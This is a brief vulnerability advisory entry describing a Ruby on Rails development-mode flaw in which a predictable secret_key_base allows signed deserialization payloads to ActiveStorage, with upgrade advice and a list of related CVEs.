Description
In development mode, Ruby on Rails application uses an application name as the secret_key_base. It allows an attacker to set a valid signature for a serialized payload to ActiveStorage component. During the deserialization process, ActiveStorage executes arbitrary commands in OS.
Remediation
Upgrade to the latest version of Ruby on Rails
References
Related Vulnerabilities
WebLogic Deserialization of Untrusted Data Vulnerability (CVE-2020-9546)
PrestaShop Improper Input Validation Vulnerability (CVE-2023-39530)
Internet Information Services CVE-2001-0146 Vulnerability (CVE-2001-0146)
Liferay Portal Cleartext Storage of Sensitive Information Vulnerability (CVE-2021-33325)